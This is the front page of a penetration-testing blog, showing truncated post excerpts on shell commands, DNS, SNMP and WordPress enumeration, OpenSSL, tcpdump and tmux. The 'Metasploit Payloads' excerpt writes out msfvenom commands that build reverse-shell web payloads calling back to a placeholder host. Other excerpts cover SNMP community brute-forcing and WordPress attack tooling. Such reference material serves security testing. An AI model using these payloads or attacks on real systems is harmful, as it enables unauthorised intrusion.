SAROOT.NET
The Collection of PenetrationTesting!
Menu Close
  • Home
  • Penetration Testing
  • Incident Response
  • Forensics
  • SysAdminSec

Author: SAROOT

Misc CMDs

Posted on April 18, 2021 by SAROOT

Looping: for i in $(seq 0 10); do ls; done watch -n 1 ls -la watch -n 1 cat someting.txt Find Strings in files grep -H -i “Some Text Here” * -R | cut -d: -f1 | sort -u Grep… Continue Reading →

Uncategorized grep, watch, xargs, xclip

Metasploit Payloads

Posted on April 18, 2021 by SAROOT

Web Based Payloads PHP msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > rshell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.jsp WAR (Tomcat) msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444… Continue Reading →

Uncategorized metasploit-payload, shell, shellcode

DNS – Enumeration Technics

Posted on April 18, 2021 by SAROOT

Once we have found that there is a DNS ports (TCP 53/UDP 53) running on the target then we can use quick command below to test DNS zone transfer vulnerability. Zone Transfer technics dig axfr abc.com @nameserver nslookup> set type=any>… Continue Reading →

Penetration Testing dig, dns, dnsrecon, nslookup

OpenSSL useful commands

Posted on April 18, 2021 by SAROOT

1. Connect to specific port and show certificate detail $ openssl s_client -showcerts -connect www.saroot.net:443   2. Show certificate expire date $ echo | openssl s_client -connect www.saroot.net:443 2>/dev/null | openssl x509 -noout -dates   3. Certificate finger print $… Continue Reading →

SysAdminSec openssl, ssl

SNMP Enumeration

Posted on April 18, 2021 by SAROOT

nmap -sU -p 161 –script=snmp-info.nse x.x.x.x -oN $target-nsmp-enum.nmap snmpenum -t x.x.x.x snmpcheck -t x.x.x.x -c public SMB Public Bruteforce echo public > community.txt; echo private >> community.txt for ip in $(seq 1 254);do echo 192.168.1.$ip;done > ip.txt onesixtyone -c community.txt… Continue Reading →

Penetration Testing onesixtyone, snmp, snmpcheck, snmpenum, snmpwalk

TCPDump – Cheat Sheet

Posted on April 18, 2021 by SAROOT

Filter by destination IP and ports$ tcpdump -n “dst host 192.168.1.1 and dst port 23”$ tcpdump -n “dst host 192.168.1.1 and (dst port 23 or dst port 443)”$ tcpdump -n “dst net 192.168.10/24 and dst port 23”$ tcpdump -n “dst… Continue Reading →

Forensics, Incident Response, Penetration Testing tcpdump

Tmux Technics

Posted on April 18, 2021 by SAROOT

My notes on how to use tmux! (Prefix) + ? – Tmux Help(Prefix) + z – Zoom terminal(Prefix) + c – Create new windows(Prefix) + 0 – Goto windows #0(Prefix) + 1 – Goto windows #1(Prefix) + s – send… Continue Reading →

Penetration Testing tmux

Attacking WordPress site

Posted on April 18, 2021 by SAROOT

Quick technics and tools for basic attacking WP websites: WPScan $ wpscan -u http://pentest.local/weblog/ –enumerate t –enumerate u $ wpscan -random-agent -u http://pentest.local –proxy 127.0.0.1:8080 Note : Don’t trust WPScan result, always check against Searchsploit for all plugins vulnerability!! Brute-forcing… Continue Reading →

Penetration Testing bruteforce, cracking, hashcat, wordpress, wpscan

SAROOT.NET is back online

Posted on August 21, 2018 by SAROOT

Hey Friends and Welcome! Sorry to anyone who are waiting to access the site. 🙂 I am planing to bring this website online very shortly and I will keep adding interesting and useful stuff in to it. This new site… Continue Reading →

Uncategorized

Recent Posts

  • Misc CMDs
  • Metasploit Payloads
  • DNS – Enumeration Technics
  • OpenSSL useful commands
  • SNMP Enumeration

Tags

bruteforce (1) cracking (1) dig (1) dns (1) dnsrecon (1) grep (1) hashcat (1) metasploit-payload (1) nslookup (1) onesixtyone (1) openssl (1) shell (1) shellcode (1) snmp (1) snmpcheck (1) snmpenum (1) snmpwalk (1) ssl (1) tcpdump (1) tmux (1) watch (1) wordpress (1) wpscan (1) xargs (1) xclip (1)

Categories

  • Forensics (1)
  • Incident Response (1)
  • Penetration Testing (5)
  • SysAdminSec (1)
  • Uncategorized (3)
© 2025 SAROOT.NET. All rights reserved.
Hiero by aThemes